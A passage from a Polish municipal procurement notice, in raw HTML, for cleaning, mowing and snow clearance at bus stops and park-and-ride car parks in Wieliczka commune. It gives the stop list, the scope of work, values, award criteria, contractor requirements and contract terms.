lewy<br/>Czarnochowice VIII - prawy i lewy<br/>Czarnochowice Osiedle – prawy i lewy <br/>Dobranowice I - prawy i lewy<br/>Dobranowice II<br/>Dobranowice III - prawy i lewy<br/>Dobranowice IV - prawy i lewy<br/>Dobranowice V - prawy i lewy<br/>Dobranowice II Szkoła<br/>Golkowice Kościół - prawy i lewy<br/>Golkowice Sklep - prawy i lewy<br/>Golkowice Pętla<br/>Gorzków Czarnociny - prawy i lewy<br/>Gorzków Czarnociny II - prawy i lewy<br/>Gorzków Czarnociny III - prawy i lewy<br/>Gorzków II<br/>Gorzków Kapliczka - prawy i lewy<br/>Gorzków Kościół - prawy i lewy<br/>Gorzków OSP - prawy i lewy<br/>Grabie Dom Kultury - prawy i lewy<br/>Grabie I - prawy i lewy<br/>Grabie Gruczyn - prawy i lewy<br/>Grabie Kościół - prawy i lewy<br/>Grabie Kościół – przystanek końcowy<br/>Grabie Szczurów - prawy i lewy<br/>Grabówki II -prawy i lewy<br/>Grabówki IV - prawy i lewy<br/>Grabówki V -prawy i lewy<br/>Grabówki VI - prawy i lewy<br/>Grabówki VII - prawy i lewy<br/>Grabówki Pętla<br/>Grajów Kapliczka <br/>Grajów I - prawy i lewy<br/>Grajów II - prawy i lewy<br/>Grajów III - prawy i lewy<br/>Grajów IV za Szkołą - prawy i lewy<br/>Grajów VIII<br/>Grajów osiedle Kąty - prawy i lewy<br/>Grajów Przymiarki<br/>Grajów V Boisko<br/>Grajów Żakowa – prawy i lewy<br/>Jankówka -prawy i lewy<br/>Jankówka OSP -prawy i lewy<br/>Janowice Bałówka I<br/>Janowice Bałówka II<br/>Janowice IX<br/>Janowice Avita - prawy i lewy<br/>Janowice Dwór<br/>Janowice I<br/>Janowice Krzyżówka<br/>Janowice Panciawa I -prawy i lewy<br/>Janowice Pod Szkołą<br/>Janowice Szkoła- prawy i lewy<br/>Janowice Karczma<br/>Janowice Pod wysokim napięciem<br/>Kokotów I - prawy i lewy<br/>Kokotów II- prawy i lewy<br/>Kokotów I przy skrzyżowaniu<br/>Kokotów Kościół<br/>Kokotów Wiadukt - prawy i lewy<br/>Kokotów Rowerowa – prawy i lewy<br/>Koźmice Małe<br/>Koźmice Male na Mostach<br/>Koźmice Małe Skrzyżowanie – prawy i lewy<br/>Koźmice Małe Wilga – prawy i lewy<br/>Koźmice Wielkie Bugaj - prawy i lewy<br/>Koźmice Wielkie Bugaj V - prawy i lewy<br/>Koźmice Wielkie Centrum - prawy i lewy<br/>Koźmice Wielkie Dąbrowy I -prawy i lewy<br/>Koźmice Wielkie Dąbrowy II -prawy i lewy<br/>Koźmice Wielkie Dąbrowy III -prawy i lewy<br/>Koźmice Wielkie Podgorzków -prawy i lewy<br/>Koźmice Wielkie Skrzyżowanie -prawy i lewy<br/>Koźmice Wielkie Spławy-prawy i lewy<br/>Koźmice Wielkie Szkoła<br/>Koźmice Wielkie Wilga<br/>Koźmice Wielkie Skrzyżowanie -prawy i lewy<br/>Lednica Górna I<br/>Lednica Górna II<br/>Lednica Górna III<br/>Lednica Górna IV<br/>Lednica Górna V<br/>Lednica Górna VI<br/>Lednica Górna VII<br/>Lednica Górna VIII<br/>Lednica Górna Gory -prawy i lewy<br/>Lednica Górna Świdówka - prawy i lewy<br/>Mała Wieś - prawy i lewy<br/>Mała Wieś Sklep - prawy i lewy<br/>Mała Wieś Kapliczka - prawy i lewy<br/>Mała Wieś Zakątek - prawy i lewy<br/>Strumiany Przedszkole, Strumiany Kościół<br/>Mała Wieś – Sułków ( Przy składzie)<br/>Mietniów I - prawy i lewy<br/>Mietniów II<br/>Mietniów III - prawy i lewy <br/>Mietniów IV - prawy i lewy<br/>Mietniów Pod Masztem<br/>Mietniów Stawy - prawy i lewy<br/>Mietniów Szkoła - prawy i lewy<br/>Pawlikowice Cmentarz - prawy i lewy<br/>Pawlikowice Krzyż - prawy i lewy<br/>Pawlikowice I<br/>Pawlikowice II - prawy i lewy<br/>Pawlikowice III - prawy i lewy<br/>Pawlikowice Skrzyżowanie - prawy i lewy<br/>Podstolice Cmentarz - prawy i lewy<br/>Podstolice I - prawy i lewy<br/>Podstolice II<br/>Raciborsko Lipowa - prawy i lew<br/>Raciborsko Na Krzyżówce<br/>Raciborsko Podedwór<br/>Raciborsko V<br/>Raciborsko Sieprawówka - prawy i lewy<br/>Raciborsko Szkoła - prawy i lewy<br/>Rożnowa I - prawy i lewy<br/>Rożnowa II - prawy i lewy<br/>Rożnowa Centrum - prawy i lewy<br/>Rożnowa II - prawy i lewy<br/>Siercza I Szkoła<br/>Siercza III - prawy i lewy<br/>Siercza I - prawy i lewy<br/>Siercza II - prawy i lewy<br/>Siercza IV - prawy i lewy<br/>Siercza Kapliczka - prawy i lewy<br/>Siercza IX - prawy i lewy<br/>Sułków<br/>Sułków Boisko - prawy i lewy<br/>Sułków Osiedle - prawy i lewy<br/>Sułków Sklep - prawy i lewy<br/>Sułków Zwólka - prawy i lewy<br/>Sygneczów Stacja Trafo - prawy i lewy<br/>Sygneczów Młyn -prawy i lewy<br/>Sygneczów Sklep - prawy i lewy<br/>Sygneczów Zakręt - prawy i lewy<br/>Sygneczów Kościół<br/>Sygneczów Wilga – prawy i lewy<br/>Śledziejowice Szkoła - prawy i lewy<br/>Śledziejowice Arka - prawy i lewy<br/>Śledziejowice II - prawy i lewy<br/>Śledziejowice Europejska - prawy i lewy<br/>Śledziejowice I - prawy i lewy<br/>Węgrzce Wielkie Gościniec - prawy i lewy<br/>Węgrzce Wielkie Krupy I - prawy i lewy<br/>Wegrzce Wielkie Krupy II - prawy i lewy<br/>Węgrzce Wielkie OSP - prawy i lewy<br/>Węgrzce Wielkie Szkoła - prawy i lewy<br/>Węgrzce Wielkie VII - prawy i lewy<br/>Węgrzce Wielkie Pętla – prawy i lewy <br/>Węgrzce Wielkie Kolejowa – prawy i lewy<br/>Zabawa - prawy i lewy<br/>Zabawa Granica <br/> <br/> 2. ZAKRES WYMAGANYCH PODSTAWOWYCH PRAC ZWIĄZANYCH Z ZADANIAMI DOTYCZĄCYMI CZĘŚCI 2,<br/> 2.1. Utrzymanie w należytym porządku terenu zatok/miejsc przystankowych/parkingów, zamiatanie, opróżnianie koszy na śmieci, uzupełnianie wkładów (worków):<br/>- Utrzymanie czystości na przystankach komunikacyjnych/zatokach przystankowych/parkingach polegające na bieżącym zbieraniu śmieci z terenu. <br/>- Opróżnianie koszy na przystankach komunikacyjnych/parkingach minimum 2 razy w tygodniu, uzupełnianie worków na śmieci.<br/>Należy przyjąć następującą liczbę koszy na śmieci w ramach poszczególnych części zamówienia:<br/>Część 2 - 155 szt. <br/>- Oczyszczanie nawierzchni przystanków komunikacyjnych/zatok przystankowych/parkingów z błota, kurzu, liści i wszelkich innych zanieczyszczeń wraz z wywozem zebranych odpadów.<br/> 2.2. Koszenie i wywożenie trawy – jeśli w obrębie zatoki/miejsca przystankowego/parkingu znajduje się teren zielony:<br/>- Bieżące koszenie trawy, wysokość trawy: max. 15cm;<br/>- Wywóz skoszonej trawy.<br/> 2.3. W okresie zimowym odśnieżanie i posypywanie terenu zatoki/miejsca przystankowego/parkingu, wywożenie nadmiaru śniegu:<br/>- bieżące odśnieżanie i zwalczanie śliskości zimowej na przystankach komunikacyjnych/ zatokach przystankowych/parkingach, teren winien być posypany piaskiem na całej długości i szerokości;<br/>- w razie nadmiaru śniegu – śnieg powinien być wywożony na bieżąco.<br/> 2.4. Po okresie zimowym teren przystanków komunikacyjnych/zatok przystankowych/parkingów powinien zostać oczyszczony z piasku, żwiru, błota.<br/> 2.5. Mycie wiat przystankowych, usuwanie naklejek, napisów i graffiti, mycie ławek.<br/>- mycie wiat przystankowych przy użyciu piany aktywnej minimum 2 x w roku, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce,<br/>- usuwanie naklejek, zbędnych ogłoszeń (wraz z klejem i taśmą klejącą) napisów, graffiti minimum raz w miesiącu, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce;<br/>- mycie ławek;<br/>- spłukiwanie peronów po umyciu wiat. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 180000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-13 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w SWZ. Wybór najkorzystniejszej oferty odrębnie dla każdej części zamówienia nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów. Punkty będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługi interwencyjne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe mycie wiat przystankowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część 3 - Utrzymanie czystości i porządku na parkingach typu P&amp;R na terenie gminy Wieliczka:<br/>Przedmiotem zamówienia jest realizacja prac związanych z utrzymaniem czystości i porządku na parkingach typu P&amp;R na terenie gminy Wieliczka zgodnie z zakresem wymaganych prac, które obejmują:<br/>1) Parking P&amp;R + Pętla autobusowa + Przystanek autobusowy z wiatą z miejscowości Węgrzce Wielkie (dz. nr 1352/4 obręb Węgrzce Wielkie powierzchnia 0,2176 ha) <br/>2) Parking P&amp;R + Pętla autobusowa + Przystanek autobusowy z wiatą z miejscowości Byszyce (dz. nr część 465/2 i część 467/2 obręb Byszyce powierzchnia 0,1817 ha)<br/>3) Parking P&amp;R przy stacji kolejowej Węgrzce Wielkie PKP (dz. nr część 78, 79, 80, 81 obręb Węgrzce Wielkie powierzchnia 0,2615 ha)<br/>4) Parking P&amp;R przy stacji kolejowej Kokotów (dz. nr 4/31 obręb Kokotów powierzchnia 0,5322 ha) <br/>5) Parking P&amp;R przy stacji kolejowej ul. Dembowskiego (dz. nr 1752/37, 1887/4, 1887/5, 119/11 obręb nr 1 Wieliczka powierzchnia 1,32 ha).<br/>Sumaryczna powierzchnia objęta przedmiotem zamówienia wynosi 2,513 ha, w tym:<br/>- powierzchnia utwardzona – 1,422 ha,<br/>- powierzchnia terenów zielonych – 1,091 ha.<br/> <br/>2. ZAKRES WYMAGANYCH PODSTAWOWYCH PRAC ZWIĄZANYCH Z ZADANIAMI DOTYCZĄCYMI CZĘŚCI 3,<br/>2.1. Utrzymanie w należytym porządku terenu zatok/miejsc przystankowych/parkingów, zamiatanie, opróżnianie koszy na śmieci, uzupełnianie wkładów (worków):<br/>- Utrzymanie czystości na przystankach komunikacyjnych/zatokach przystankowych/parkingach polegające na bieżącym zbieraniu śmieci z terenu. <br/>- Opróżnianie koszy na przystankach komunikacyjnych/parkingach minimum 2 razy w tygodniu, uzupełnianie worków na śmieci.<br/>Należy przyjąć następującą liczbę koszy na śmieci w ramach poszczególnych części zamówienia:<br/> Część 3 - 41 szt.<br/>- Oczyszczanie nawierzchni przystanków komunikacyjnych/zatok przystankowych/parkingów z błota, kurzu, liści i wszelkich innych zanieczyszczeń wraz z wywozem zebranych odpadów.<br/>2.2. Koszenie i wywożenie trawy – jeśli w obrębie zatoki/miejsca przystankowego/parkingu znajduje się teren zielony:<br/>- Bieżące koszenie trawy, wysokość trawy: max. 15cm;<br/>- Wywóz skoszonej trawy.<br/>2.3. W okresie zimowym odśnieżanie i posypywanie terenu zatoki/miejsca przystankowego/parkingu, wywożenie nadmiaru śniegu:<br/>- bieżące odśnieżanie i zwalczanie śliskości zimowej na przystankach komunikacyjnych/ zatokach przystankowych/parkingach, teren winien być posypany piaskiem na całej długości i szerokości;<br/>- w razie nadmiaru śniegu – śnieg powinien być wywożony na bieżąco.<br/>2.4. Po okresie zimowym teren przystanków komunikacyjnych/zatok przystankowych/parkingów powinien zostać oczyszczony z piasku, żwiru, błota.<br/>2.5. Mycie wiat przystankowych, usuwanie naklejek, napisów i graffiti, mycie ławek.<br/>- mycie wiat przystankowych przy użyciu piany aktywnej minimum 2 x w roku, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce,<br/>- usuwanie naklejek, zbędnych ogłoszeń (wraz z klejem i taśmą klejącą) napisów, graffiti minimum raz w miesiącu, a w przypadku zgłoszeń wpływających do urzędu ( mailowe/ telefoniczne / pisemne) - dodatkowo na wezwanie pracownika Urzędu Miasta i Gminy w Wieliczce;<br/>- mycie ławek;<br/>- spłukiwanie peronów po umyciu wiat. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 56400,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-13 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w SWZ. Wybór najkorzystniejszej oferty odrębnie dla każdej części zamówienia nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów. Punkty będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługi interwencyjne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe mycie wiat przystankowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez zamawiającego warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń powtarzających się lub ciągłych wykonuje, co najmniej jedną usługę polegającą na utrzymaniu czystości na terenach zewnętrznych przez okres minimum 6 miesięcy o wartości co najmniej 50 000,00 zł brutto.<br/>W przypadku świadczeń powtarzających się lub ciągłych posiadanie doświadczenia dotyczy usługi wykonanej w ramach świadczeń powtarzających się lub ciągłych. <br/>Wyżej opisany warunek udziału w postępowaniu dotyczy Wykonawcy niezależnie od ilości części na które Wykonawca składa ofertę.<br/>Uwaga. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi podmiotami (w ramach konsorcjum) do oceny spełniania warunku należy wziąć pod uwagę tylko usługi w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonaniu bezpośrednio uczestniczył lub uczestniczy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych. Ocena spełniania braku podstaw do wykluczenia odbędzie się w oparciu o oświadczenie składane na podstawie art. 125 ust. 1 uPzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych. Ocena spełniania warunku udziału w postępowaniu odbędzie się w oparciu o oświadczenie składane na podstawie art. 125 ust. 1 uPzp.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – sporządzonym według wzoru stanowiącym Załącznik nr 1 do SWZ, wypełnionym dla części na którą Wykonawca składa ofertę oraz opatrzony stosownym podpisem.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1. Wypełniony formularz cenowy dla części na którą Wykonawca składa ofertę, sporządzony odpowiednio na Załączniku nr 1a (Cześć 1), 1b (Część 2), 1c (Część 3) do SWZ oraz opatrzony stosownym podpisem Niezłożenie formularza cenowego dla danej części zamówienia skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 uPzp w tej części. <br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, t.j oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – sporządzone zgodnie z Załącznikiem nr 2 do SWZ oraz opatrzone stosownym podpisem. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>2.1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. W/w dotyczy również odpowiednio wspólników spółki cywilnej, którzy traktowani będą jak wykonawcy wspólnie ubiegający się u dzielenie zamówienia publicznego.<br/>2.2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem o którym mowa w art. 125 ust. 1 uPzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. Oświadczenie należy sporządzić zgodnie z Załącznikiem nr 2a do SWZ oraz opatrzyć stosownym podpisem. <br/>3. Zobowiązanie innego podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy (jeżeli dotyczy). <br/>4. Dokumenty, z których wynika prawo do podpisania oferty – (np. odpis z KRS, CEiIoDG, odpowiednie pełnomocnictwa).<br/>5. Oświadczenie z którego wynika, które roboty usługi wykonają poszczególni wykonawcy – w przypadku zaistnienia okoliczności o których mowa w pkt 16.1.5.2) SWZ. <br/>Uwaga. Ofertę oraz dokumenty i oświadczenia składane wraz z ofertą należy składać w formie elektronicznej (t.j. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć do oferty dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia.<br/>4. Pełnomocnictwo musi przyjąć taką samą formę jak składana oferta (art. 99 § 1 KC).<br/>5. Oświadczenie o którym mowa w art. 125 ust. 1 uPZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>6.1. Zamawiający zastrzega, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z tych Wykonawców musi posiadać wymagane doświadczenie.<br/>6.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane, przy czym w takim wypadku Wykonawcy wraz z ofertą zobowiązani są złożyć oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadku:<br/>1) zmian nazwy, siedziby lub innych danych Wykonawcy,<br/>2) udziału lub zmiany podwykonawców,<br/>3) wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych,<br/>4) zmiany wynagrodzenia brutto w związku ze zmianą stawki podatku VAT. Wartości netto pozostaną bez zmian, a nowe kwoty wynagrodzenia brutto Wykonawcy zostaną wyliczone na podstawie nowych przepisów.<br/>5) zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy,<br/>6) zmiany osób wskazanych w umowie, przy czym w przypadku zmiany osoby sprawującej nadzór wskazanej w ofercie, osoba zastępująca musi posiadać doświadczenie odpowiadające punktacji przyznanej w kryterium oceny ofert za doświadczenie osoby zastępowanej,<br/>7) dopuszczalne są wszelkie zmiany które nie są istotne w rozumieniu art. 454 ust. 2 uPzp,<br/>8) wystąpienia niemożliwych do przewidzenia prac wymagających wykonania prac zastępczych lub dodatkowych, nie leżących po stronie Wykonawcy z przyczyn powodujących opóźnienie w wykonaniu umowy.<br/>9) zmian poprawiających sprawność wykonywania usług (w tym zmiana technologii ich wykonywania), pod warunkiem że nie spowoduje to wzrostu wynagrodzenia; w przypadku zaniechania wykonania usług wynagrodzenie ulegnie pomniejszeniu.<br/>3. Określa się następujący tryb dokonywania zmian postanowień umowy. Sposób inicjowania zmian:<br/>1) Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,<br/>2) Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.<br/>3) Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach takich jak notatka służbowa, pismo Wykonawcy, protokół konieczności itp.<br/><br/>Ciąg dalszy w sekcji 11 nin. ogłoszenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1036315</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy przewidywanych zmian umowy:<br/><br/>4. Zamawiający przewiduje możliwości dokonania zmiany wynagrodzenia należnego Wykonawcy poprzez zawarcie aneksu do niniejszej umowy w niżej wymienionych przypadkach (tzw. klauzula waloryzacyjna).<br/>1) Zmiana wynagrodzenia musi być związana ze zmianą kosztów związanych z realizacją zamówienia oraz jest możliwa jednorazowo, w oparciu o wskaźnik cen towarów i usług konsumpcyjnych (ogółem) publikowanego raz na miesiąc przez Prezesa Głównego Urzędu Statystycznego (dalej: „wskaźnik GUS”).<br/>2) Przez zmianę kosztów rozumie się wzrost kosztów, jak i ich obniżenie, względem kosztów przyjętych w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie.<br/>3) Waloryzacja może nastąpić na podstawie wniosku złożonego przez jedną ze stron umowy nie wcześniej niż po upływie 6 miesięcy licząc od daty zawarcia umowy.<br/>4) Zwiększenie wynagrodzenia nastąpi w przypadku gdy skumulowany wzrost cen począwszy od miesiąca w którym zawarto umowę, na moment złożenia wniosku przez stronę, będzie większy niż 